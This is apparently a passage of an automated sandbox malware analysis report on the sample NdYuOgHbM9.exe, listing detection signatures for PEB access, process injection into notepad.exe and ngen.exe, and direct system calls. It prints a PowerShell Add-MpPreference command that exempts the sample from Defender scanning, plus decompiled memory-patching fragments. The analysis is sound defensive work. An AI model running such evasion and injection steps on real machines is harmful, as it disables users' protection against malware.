            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE6F2 mov eax, dword ptr fs:[00000030h]5_2_057AE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B06F1 mov eax, dword ptr fs:[00000030h]5_2_057B06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B06F1 mov eax, dword ptr fs:[00000030h]5_2_057B06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057ED6F0 mov eax, dword ptr fs:[00000030h]5_2_057ED6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C36EE mov eax, dword ptr fs:[00000030h]5_2_057C36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D6E0 mov eax, dword ptr fs:[00000030h]5_2_0575D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D6E0 mov eax, dword ptr fs:[00000030h]5_2_0575D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0576A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A6C7 mov eax, dword ptr fs:[00000030h]5_2_0576A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B6C0 mov eax, dword ptr fs:[00000030h]5_2_0573B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC mov eax, dword ptr fs:[00000030h]5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805636 mov eax, dword ptr fs:[00000030h]5_2_05805636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF6C7 mov eax, dword ptr fs:[00000030h]5_2_057EF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057616CF mov eax, dword ptr fs:[00000030h]5_2_057616CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057276B2 mov eax, dword ptr fs:[00000030h]5_2_057276B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057666B0 mov eax, dword ptr fs:[00000030h]5_2_057666B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C6A6 mov eax, dword ptr fs:[00000030h]5_2_0576C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D6AA mov eax, dword ptr fs:[00000030h]5_2_0572D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D6AA mov eax, dword ptr fs:[00000030h]5_2_0572D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05734690 mov eax, dword ptr fs:[00000030h]5_2_05734690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05734690 mov eax, dword ptr fs:[00000030h]5_2_05734690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B368C mov eax, dword ptr fs:[00000030h]5_2_057B368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C9179 mov eax, dword ptr fs:[00000030h]5_2_057C9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737152 mov eax, dword ptr fs:[00000030h]5_2_05737152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572C156 mov eax, dword ptr fs:[00000030h]5_2_0572C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05736154 mov eax, dword ptr fs:[00000030h]5_2_05736154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05736154 mov eax, dword ptr fs:[00000030h]5_2_05736154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov ecx, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731131 mov eax, dword ptr fs:[00000030h]5_2_05731131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731131 mov eax, dword ptr fs:[00000030h]5_2_05731131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058051CB mov eax, dword ptr fs:[00000030h]5_2_058051CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05760124 mov eax, dword ptr fs:[00000030h]5_2_05760124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov ecx, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058061E5 mov eax, dword ptr fs:[00000030h]5_2_058061E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F0115 mov eax, dword ptr fs:[00000030h]5_2_057F0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057601F8 mov eax, dword ptr fs:[00000030h]5_2_057601F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057351ED mov eax, dword ptr fs:[00000030h]5_2_057351ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D1D0 mov eax, dword ptr fs:[00000030h]5_2_0576D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0576D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov ecx, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F61C3 mov eax, dword ptr fs:[00000030h]5_2_057F61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F61C3 mov eax, dword ptr fs:[00000030h]5_2_057F61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574B1B0 mov eax, dword ptr fs:[00000030h]5_2_0574B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805152 mov eax, dword ptr fs:[00000030h]5_2_05805152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: NdYuOgHbM9.exe, --------.cs - Reference to suspicious API methods: ((_FDEE_FBD2)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_0619(_0670_FDFE_0603_06FE._FBB4)), _0619(_0670_FDFE_0603_06FE._FBCA_064D)), typeof(_FDEE_FBD2)))("626949", out var _)
            Source: NdYuOgHbM9.exe, --------.cs - Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _061A_FDE2_FBC8)
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory allocated: C:\Windows\System32\notepad.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe - Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe - NtDelayExecution: Direct from: 0x76F02DDC
